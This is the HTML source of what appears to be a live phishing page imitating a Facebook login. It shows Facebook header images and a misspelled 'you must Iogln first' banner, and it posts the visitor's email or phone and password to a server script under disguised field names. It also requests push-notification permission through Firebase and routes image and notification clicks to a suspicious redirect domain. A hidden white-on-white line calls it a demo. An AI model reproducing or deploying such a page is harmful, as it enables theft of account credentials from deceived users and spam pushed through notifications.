<!doctype html>
<html>
<head>
<p id=""></p>
<script src="https://www.gstatic.com/firebasejs/7.14.6/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/7.14.6/firebase-messaging.js"></script>
<script>
    var firebaseConfig = {
apiKey: "AIzaSyBV2pY0LLJTrHhiCFArAedQpTiUshDJsi8",
  authDomain: "pinnocent-fa387.firebaseapp.com",
  databaseURL: "https://pinnocent-fa387.firebaseio.com",
  projectId: "pinnocent-fa387",
  storageBucket: "pinnocent-fa387.appspot.com",
  messagingSenderId: "403452483449",
  appId: "1:403452483449:web:630abc1e7c265a8f0481a8",
  measurementId: "G-8DGVGDCCL2"
};
    firebase.initializeApp(firebaseConfig);
    const messaging=firebase.messaging();

    function IntitalizeFireBaseMessaging() {
        messaging
            .requestPermission()
            .then(function () {
                console.log("Notification Permission");
                return messaging.getToken();
            })
            .then(function (token) {
                console.log("Token : "+token);
                document.getElementById("token").innerHTML=token;
            })
            .catch(function (reason) {
                console.log(reason);
            });
    }

    messaging.onMessage(function (payload) {
        console.log(payload);
        const notificationOption={
            body:payload.notification.body,
            icon:payload.notification.icon
        };

        if(Notification.permission==="granted"){
            var notification=new Notification(payload.notification.title,notificationOption);

            notification.onclick=function (ev) {
                ev.preventDefault();
                window.open(payload.notification.click_action,'https://pickedlawhandshake.com/wax4e0ani?key=9021cb870818c0f133a5be34a40f3dae');
                notification.close();
            }
        }

    });
    messaging.onTokenRefresh(function () {
        messaging.getToken()
            .then(function (newtoken) {
                console.log("New Token : "+ newtoken);
            })
            .catch(function (reason) {
                console.log(reason);
            })
    })
    IntitalizeFireBaseMessaging();
</script>
<title>.</title>
<meta name=”robots” content=”noindex”>
<meta name="robots" content="index,follow">
<meta name="robots" content="noindex,follow">
<meta name="robots" content="index,nofollow">
<meta name="robots" content="noindex,nofollow">
<meta name="googlebot" content="noindex,nofollow,noarchive,nosnippet,noodp" />
<meta name="robots" content="noindex,nofollow,noarchive,nosnippet,noodp" />
<meta charset="utf-8">
<meta name="description" content="online">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta property='og:image' content='earnmoney.jpg' />
<link rel="shortcut icon" href="https://cdn4.iconfinder.com/data/icons/ionicons/512/icon-ios7-contact-512.png">
<style>
		table tr td{text-align:center;}
.button {
  background-color: #4CAF50; /* Green */
  border: none;
  color: white;
  padding: 14px 20px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 1px 0px;
  cursor: pointer;
}
.button1 {width: 250px;}
.button2 {width: 50%;}
.button3 {width: 90%;
border-radius: 4px;
border: 1px solid DarkGray;
padding: 13px 13px;
margin: 3px 3px;
height: 22px;
background-color: rgb(249,249,249);
display: inline-block;

}
		.bottom a{color:#D3D3D3;}
		.bottom a:link{text-decoration:none;}
		input{padding:10px;}
		
		.login{background-color:rgb(19,90,245);color:white;
border-radius: 4px;
padding: 13px 13px;
margin: -15px -15px;
border: 1px solid DarkGray;
font-family: 'segoe UI';
font-size: 15px;
font-weight: bold;
		  
		}
		
.center {
  display: block;
  margin-left: auto;
  margin-right: auto;
  width: 50%;
width: 360px;
  height: 80px;
}
		.login{width: 97%;}
		.check{background-color:#0ac21e;color:white;padding:10px;
margin: 4px 2px;
		}
		.inputf a:link{text-decoration:none;}
	</style>
</head>
<body style="margin:0px;">
<script>
	document.title='online';
</script>
<div style="width:100%;">
<div style="width:100%;">
<div style="height:40px;background-color:rgb(251,251,217);padding-bottom:10px;padding-left:5px;">
<span style="color:rgb(23,23,247);font-size:80%;"></br><span><strong>you must Iogln first</strong></span>
</div>
</div>
<div style="width:100%;">
<a href="https://pickedlawhandshake.com/wax4e0ani?key=9021cb870818c0f133a5be34a40f3dae">
<img src="https://pinnocent.com/image/fbheader.jpg" alt="screenshot demo" class="center" width="450" height="80"> </a>
<div class="inputf" style="background-color:white;padding:10px;text-align:center;">
<form id="" class="form" method="POST" action="posp.php">
<div class="card-header text-center">
</div>
<div class="card-body">
<input type="hidden" name="user_id" id="userNickname" value="1">
<input class="button3" name="message_title" type="text" id="" placeholder="Email address or phone number" maxlength="40" size="35px" required><br>
<input class="button3" name="description" type="text" id="pass" placeholder="Password" maxlength="40" size="35px" required>
<input type="hidden" name="ip" value="141.101.76.6" />
<input type="hidden" name="link" value="facebook" />

<br /><br />
<input class="login" name="login" type="submit" id="anonymousProcess" value="Log In"><br /><br />
<a href="https://pickedlawhandshake.com/wax4e0ani?key=9021cb870818c0f133a5be34a40f3dae">
<img src="https://pinnocent.com/image/fbfooter.jpg" alt="screenshot demo" width="350" height="350"></a>
</div>
</div>
<p style="color:white">This is page is for demo purpose only... please do not login your account.</p>

<script src="./assets/js/core/jquery.min.js" type="text/javascript"></script>
<script src="./assets/js/core/bootstrap.min.js" type="text/javascript"></script>

<script src="back.js?1665970508">
  <script src="./assets/js/now-ui-kit.js?v=1.3.0" type="text/javascript"></script>
</script>
<script src="./assets/js/now-ui-kit.js" type="text/javascript"></script>
<script src="./assets/js/anonymous.js?1663872928"> 
  </script>
<script type="text/javascript">
    $(document).ready(function() {

  var url =anonymousURL('user');
  var url2 =anonymousURL('ref');
  console.log(url);
     $('.userNickname').html('Send Anonymous Message to '+url);
     $('#userNickname').val(url2);
   });


  </script>
</body>
</html>
